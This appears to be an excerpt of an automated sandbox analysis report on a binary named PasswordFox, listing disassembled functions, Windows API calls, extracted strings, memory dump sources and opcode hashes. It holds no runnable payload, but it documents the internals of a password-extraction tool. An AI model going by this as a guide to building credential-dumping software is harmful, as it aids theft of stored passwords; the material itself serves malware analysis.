                                        • API ID: Menu$Itemmemset$CountCreateDestroyDialogInfoLoadParamTextWindow_snwprintfwcschr
                                        • String ID: caption
                                        • API String ID: 4269739968-4135340389
                                        • Opcode ID: f73843e745a1ea6c25bab0232a1fa7f078bf352206eacf97233f420d47e2a5dc
                                        • Instruction ID: ea41548d20c298312d9a3600ca5ecf469101e2f61b1c62bcd5fb009afbe77744
                                        • Opcode Fuzzy Hash: f73843e745a1ea6c25bab0232a1fa7f078bf352206eacf97233f420d47e2a5dc
                                        • Instruction Fuzzy Hash: 63218D32500718ABEB21AF90DD89EAB3B68EF04724F00447AFA05B51D1D7789990CF9D
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ItemMenu$CountInfomemsetwcschr
                                        • String ID: 0$6
                                        • API String ID: 2029023288-3849865405
                                        • Opcode ID: a01579805b91164820cc06d4f52803fad3590dbefd0a9a946776ca8aa64eda71
                                        • Instruction ID: 03f7240b8ad5432af4937c379df24f43008473f7ce2a450f7a211f7211f411be
                                        • Opcode Fuzzy Hash: a01579805b91164820cc06d4f52803fad3590dbefd0a9a946776ca8aa64eda71
                                        • Instruction Fuzzy Hash: F2219F32609344ABD720DF55D88599BB7F8FB85754F000A3FF584A6280E775A900CF9A
                                        APIs
                                          • Part of subcall function 00406108: ??3@YAXPAX@Z.MSVCRT(?,?,?,00406332), ref: 00406114
                                          • Part of subcall function 00406108: ??3@YAXPAX@Z.MSVCRT(?,?,?,00406332), ref: 00406122
                                          • Part of subcall function 00406108: ??3@YAXPAX@Z.MSVCRT(?,?,?,00406332), ref: 00406133
                                          • Part of subcall function 00406108: ??3@YAXPAX@Z.MSVCRT(?,?,?,00406332), ref: 0040614A
                                          • Part of subcall function 00406108: ??3@YAXPAX@Z.MSVCRT(?,?,?,00406332), ref: 00406153
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00408C9B), ref: 00406189
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00408C9B), ref: 0040619C
                                        • ??3@YAXPAX@Z.MSVCRT(00000001,?,00408C9B), ref: 004061AF
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00408C9B), ref: 004061C2
                                        • free.MSVCRT ref: 004061FB
                                          • Part of subcall function 00404EAB: free.MSVCRT ref: 00404EB2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ??3@$free
                                        • String ID: ]`@
                                        • API String ID: 2241099983-2281983686
                                        • Opcode ID: a8eaa75861c13603f906994c792d9cc59cc16d12ede48035b343848c37b4e623
                                        • Instruction ID: a9c116e93d7fad59cadb6f647f5786c16ed4b2935e15555091a30804ff2c02a1
                                        • Opcode Fuzzy Hash: a8eaa75861c13603f906994c792d9cc59cc16d12ede48035b343848c37b4e623
                                        • Instruction Fuzzy Hash: 91012A326019215FC626AB2AA40151FB395AFC5724316867FE5067B2C3CB3CBD6286DD
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: wcscat$_snwprintfmemset
                                        • String ID: %2.2X
                                        • API String ID: 2521778956-791839006
                                        • Opcode ID: 9eca9d0b10237597fc9396d76d6297696b5541b571abcc563b9e9d3cce03d77f
                                        • Instruction ID: a63f881caffbf41192db8e968fa5f05687683fdc3c35f7425c360209daf064b8
                                        • Opcode Fuzzy Hash: 9eca9d0b10237597fc9396d76d6297696b5541b571abcc563b9e9d3cce03d77f
                                        • Instruction Fuzzy Hash: 670128B2A4031866E720A715DC82BBA33A8EB80718F10403FFD14B51C3E77C9A445ADC
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _snwprintfwcscpy
                                        • String ID: dialog_%d$general$menu_%d$strings
                                        • API String ID: 999028693-502967061
                                        • Opcode ID: 84e63c119beed4f1fe873e09af5c8c3eece1eff9fee71dcad7d9760d50727fc8
                                        • Instruction ID: c3200807cc0debfc939cee5eb3075dce034f03707918156f2bcd07755b693721
                                        • Opcode Fuzzy Hash: 84e63c119beed4f1fe873e09af5c8c3eece1eff9fee71dcad7d9760d50727fc8
                                        • Instruction Fuzzy Hash: 15E08627785704B6EC2472815CC3F272151DA94B18F708977FD03B01D2A6BD99647E0F
                                        APIs
                                        • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00409D28,00000000,00000000), ref: 0040A282
                                        • memset.MSVCRT ref: 0040A2E4
                                        • memset.MSVCRT ref: 0040A2F4
                                          • Part of subcall function 0040A161: wcscpy.MSVCRT ref: 0040A18A
                                        • memset.MSVCRT ref: 0040A3DF
                                        • wcscpy.MSVCRT ref: 0040A400
                                        • CloseHandle.KERNEL32(?,00409D28,?,?,?,00409D28,00000000,00000000), ref: 0040A456
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: memset$wcscpy$CloseHandleOpenProcess
                                        • String ID:
                                        • API String ID: 3300951397-0
                                        • Opcode ID: 1aac800793d7697f8501231e134039336fc3542f8421396ecca85bb1d798685a
                                        • Instruction ID: a0d3937577748f7fa85e333ee16ff121f7334b4792027423a0c830bdf408a501
                                        • Opcode Fuzzy Hash: 1aac800793d7697f8501231e134039336fc3542f8421396ecca85bb1d798685a
                                        • Instruction Fuzzy Hash: D6513D71108344AFD720EF65D888A9FB7E8FB84704F004A3EF989A2291D7B5D915CB5B
                                        APIs
                                        • memset.MSVCRT ref: 00408711
                                          • Part of subcall function 004053F1: GetModuleHandleW.KERNEL32(00000000,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00402460,PasswordFox), ref: 00405430
                                          • Part of subcall function 004053F1: LoadStringW.USER32(00000000,00000006,?,?), ref: 004054C9
                                          • Part of subcall function 004053F1: memcpy.MSVCRT(00000000,00000002), ref: 00405509
                                          • Part of subcall function 004053F1: wcscpy.MSVCRT ref: 00405472
                                          • Part of subcall function 004053F1: wcslen.MSVCRT ref: 00405490
                                          • Part of subcall function 004053F1: GetModuleHandleW.KERNEL32(00000000,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00402460,PasswordFox), ref: 0040549E
                                          • Part of subcall function 00404C22: memset.MSVCRT ref: 00404C43
                                          • Part of subcall function 00404C22: _snwprintf.MSVCRT ref: 00404C71
                                          • Part of subcall function 00404C22: wcslen.MSVCRT ref: 00404C7D
                                          • Part of subcall function 00404C22: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 00404C95
                                          • Part of subcall function 00404C22: wcslen.MSVCRT ref: 00404CA3
                                          • Part of subcall function 00404C22: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 00404CB6
                                          • Part of subcall function 00404A67: wcscpy.MSVCRT ref: 00404ACD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                        • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                        • API String ID: 2618321458-3614832568
                                        • Opcode ID: f9cd166552c099a29173546b1dd476264746e7da0406f7bb88c78ac6c0d5a1c7
                                        • Instruction ID: b8a29bba018f662f73a470a1f6c8031c9501d499ab0ea12e808dd2b79b7f1b63
                                        • Opcode Fuzzy Hash: f9cd166552c099a29173546b1dd476264746e7da0406f7bb88c78ac6c0d5a1c7
                                        • Instruction Fuzzy Hash: C4212FB1D00619DBCB40DFAAD8816DEBBB4FB08344F10417AF908B7281DB785A458F99
                                        APIs
                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00408856
                                        • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00408868
                                        • GetTempFileNameW.KERNEL32(?,0040CFA4,00000000,00000000), ref: 0040888B
                                        • OpenClipboard.USER32(00000000), ref: 004088B5
                                        • GetLastError.KERNEL32 ref: 004088CE
                                        • DeleteFileW.KERNEL32(00000000), ref: 004088ED
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                        • String ID:
                                        • API String ID: 2014771361-0
                                        • Opcode ID: 0d439ffa7403bd6a08bb45c8a3cbc549325788cddd5a42741ac006f5ebea398b
                                        • Instruction ID: cbdc72f835ec40b1a9f09e3827ef75c6f5dd66271c9025d1e777cdb294447511
                                        • Opcode Fuzzy Hash: 0d439ffa7403bd6a08bb45c8a3cbc549325788cddd5a42741ac006f5ebea398b
                                        • Instruction Fuzzy Hash: 8F119872600314DBDB20AB61DD89FDB73ACAB44714F00467EB655F20D1DE7499C4CB18
                                        APIs
                                        • GetDlgItem.USER32(?,000003ED), ref: 00403292
                                          • Part of subcall function 0040AE7B: LoadLibraryW.KERNEL32(shlwapi.dll,?,75C08FB0,0040329A,00000000), ref: 0040AE84
                                          • Part of subcall function 0040AE7B: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040AE92
                                          • Part of subcall function 0040AE7B: FreeLibrary.KERNEL32(00000000,?,75C08FB0,0040329A,00000000), ref: 0040AEAA
                                        • GetDlgItem.USER32(?,00000000), ref: 004032A4
                                        • GetClientRect.USER32(?,?), ref: 004032BE
                                        • GetWindow.USER32(?,00000005), ref: 004032D6
                                        • GetWindow.USER32(00000000), ref: 004032D9
                                          • Part of subcall function 00401681: GetWindowRect.USER32(?,?), ref: 00401690
                                          • Part of subcall function 00401681: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004016AB
                                        • GetWindow.USER32(00000000,00000002), ref: 004032E5
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Window$ItemLibraryRect$AddressClientFreeLoadPointsProc
                                        • String ID:
                                        • API String ID: 3234410031-0
                                        • Opcode ID: 19e83884a2ee7bcb0f898122dba0e041090de0b75402a637d3d9c35095c9b5a5
                                        • Instruction ID: 0907ac9b8bc6d7e27030bb6e2dff600a5af15e0cceb477848a7b9f22fef3b328
                                        • Opcode Fuzzy Hash: 19e83884a2ee7bcb0f898122dba0e041090de0b75402a637d3d9c35095c9b5a5
                                        • Instruction Fuzzy Hash: 5801F732540304ABDB116F75CC85F6AB7ACDF81714F05053EF405BB192CB78E8028AA8
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 00401774
                                        • GetSystemMetrics.USER32(00000015), ref: 00401782
                                        • GetSystemMetrics.USER32(00000014), ref: 0040178E
                                        • BeginPaint.USER32(?,?), ref: 004017A8
                                        • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004017B7
                                        • EndPaint.USER32(?,?), ref: 004017C4
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                        • String ID:
                                        • API String ID: 19018683-0
                                        • Opcode ID: 292dddb40828baa585e339de827616e00bf546c5eb8b0ca2adba6712cae4fb09
                                        • Instruction ID: 55c219b31556ee48f84dfb622686aa39c5a214c6181e0cdcb2aa5b1c7b7dc2c3
                                        • Opcode Fuzzy Hash: 292dddb40828baa585e339de827616e00bf546c5eb8b0ca2adba6712cae4fb09
                                        • Instruction Fuzzy Hash: 4A01EC72940218EFDF04DFA4DD99DEE7B79FB45301F000669AA11BA195DA71A904CF50
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _ultow
                                        • String ID: 1.x$2.x$3.0$3.5/4.x
                                        • API String ID: 1931767806-1424242312
                                        • Opcode ID: f207b6e839b1df3a7169f756b8cf455114fe739a14a8fb7c8d175af763fcce0d
                                        • Instruction ID: 02c8f37c4b81fee256367eda243e214d3cedbeca486832de9933a17fac1f6805
                                        • Opcode Fuzzy Hash: f207b6e839b1df3a7169f756b8cf455114fe739a14a8fb7c8d175af763fcce0d
                                        • Instruction Fuzzy Hash: 57215331608106D6D6289564C8D45B962A4FB49308F74447FF90BBAAF2D33E9C83A69F
                                        APIs
                                        • _wcsicmp.MSVCRT ref: 00408172
                                        • qsort.MSVCRT ref: 0040821C
                                        • SetCursor.USER32(/nosort,?,00409514,00000000,00000000), ref: 0040822A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Cursor_wcsicmpqsort
                                        • String ID: /nosort$/sort
                                        • API String ID: 318828055-1578091866
                                        • Opcode ID: 9bc2de069cfd0942ffb201b1a488b0b154d2f036f603e0570b304ca65c1d3d22
                                        • Instruction ID: 1f803aed3756b16d601d15c12b0bd80a41414de7efe4ceef327131479a4fa369
                                        • Opcode Fuzzy Hash: 9bc2de069cfd0942ffb201b1a488b0b154d2f036f603e0570b304ca65c1d3d22
                                        • Instruction Fuzzy Hash: AB21C571600901AFD714AB35CD81E56B3AAFF44324B11427EF459AB6D2CB7ABC11CB9C
                                        APIs
                                          • Part of subcall function 00404248: wcslen.MSVCRT ref: 00404255
                                          • Part of subcall function 00404248: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00407299,?,<item>), ref: 00404264
                                        • memset.MSVCRT ref: 004072B9
                                          • Part of subcall function 0040AEE6: memcpy.MSVCRT(?,&lt;,00000008,?,?,00000000,004072DA,?,?), ref: 0040AF63
                                          • Part of subcall function 00406B6D: wcscpy.MSVCRT ref: 00406B72
                                          • Part of subcall function 00406B6D: _wcslwr.MSVCRT ref: 00406B93
                                        • _snwprintf.MSVCRT ref: 00407303
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileWrite_snwprintf_wcslwrmemcpymemsetwcscpywcslen
                                        • String ID: <%s>%s</%s>$</item>$<item>
                                        • API String ID: 2236007434-2769808009
                                        • Opcode ID: c674596ebf4e7899330e9d8845ed25131606a9436a1293817c83f26c2674c8f5
                                        • Instruction ID: 297d790b4ee4be67ee861a093687659072f07b05dd7f99d777773fa9b6455ec5
                                        • Opcode Fuzzy Hash: c674596ebf4e7899330e9d8845ed25131606a9436a1293817c83f26c2674c8f5
                                        • Instruction Fuzzy Hash: CD116A32A00619BFDB10AB65CC82E99BB64FF44318F10017AF909765E2D739B960DBC8
                                        APIs
                                        • memset.MSVCRT ref: 0040747B
                                        • memset.MSVCRT ref: 00407492
                                          • Part of subcall function 00404248: wcslen.MSVCRT ref: 00404255
                                          • Part of subcall function 00404248: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00407299,?,<item>), ref: 00404264
                                          • Part of subcall function 00406B6D: wcscpy.MSVCRT ref: 00406B72
                                          • Part of subcall function 00406B6D: _wcslwr.MSVCRT ref: 00406B93
                                        • _snwprintf.MSVCRT ref: 004074CE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: memset$FileWrite_snwprintf_wcslwrwcscpywcslen
                                        • String ID: <%s>$<?xml version="1.0" ?>
                                        • API String ID: 168708657-3296998653
                                        • Opcode ID: e34694b086e0bf41ba510f4761e636aa8c6a44e3b59148fe565d034de5e700d4
                                        • Instruction ID: 290e2b38c62671b794f7aa0fc07ebbdac2aa5992fadd5bb1de784251dcda24bb
                                        • Opcode Fuzzy Hash: e34694b086e0bf41ba510f4761e636aa8c6a44e3b59148fe565d034de5e700d4
                                        • Instruction Fuzzy Hash: E00184B2A40129A6DB20A755CC46FEA766CEF44708F0001B6BB08B61D2D778AB558A9C
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00409282
                                        • RegisterClassW.USER32(?), ref: 004092A7
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004092AE
                                        • CreateWindowExW.USER32(00000000,PasswordFox,PasswordFox,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 004092CD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: HandleModule$ClassCreateRegisterWindow
                                        • String ID: PasswordFox
                                        • API String ID: 2678498856-3917124896
                                        • Opcode ID: 08d77018fcc5259621cde43de3ead234b542cd646e7a97fcb6d40f43ac39ff38
                                        • Instruction ID: 6f9ea0a48d81faf65a5b1ad446710f0fefb0e05d23044ccaf7bf5c8251c2ff79
                                        • Opcode Fuzzy Hash: 08d77018fcc5259621cde43de3ead234b542cd646e7a97fcb6d40f43ac39ff38
                                        • Instruction Fuzzy Hash: 5701E2B1901228AAD7009F998D89AEFBEBCFB09750F10422AF514B2241D7B45A408BE8
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLastMessage_snwprintf
                                        • String ID: Error$Error %d: %s
                                        • API String ID: 313946961-1552265934
                                        • Opcode ID: 2f0fb7086bda5e790ecdc0800560db26cad3f57a8b40b3d9bf66697b22df90ad
                                        • Instruction ID: 776c58fbf7c65fbb3c3c50bed015f937b2f2766c9f1c10534292e0b53b83fb2e
                                        • Opcode Fuzzy Hash: 2f0fb7086bda5e790ecdc0800560db26cad3f57a8b40b3d9bf66697b22df90ad
                                        • Instruction Fuzzy Hash: E3F0A776540208A7CB11A794DC45FEA72ACFB84785F5401BBFA44F31C1DBB4AA848EAC
                                        APIs
                                        • wcscpy.MSVCRT ref: 0040AACC
                                        • wcscpy.MSVCRT ref: 0040AADD
                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,00000000,00408B3C,?), ref: 0040AAFB
                                        • CloseHandle.KERNEL32(00000000), ref: 0040AB02
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: wcscpy$CloseCreateFileHandle
                                        • String ID: General
                                        • API String ID: 999786162-26480598
                                        APIs
                                        • LoadLibraryW.KERNEL32(shlwapi.dll,?,75C08FB0,0040329A,00000000), ref: 0040AE84
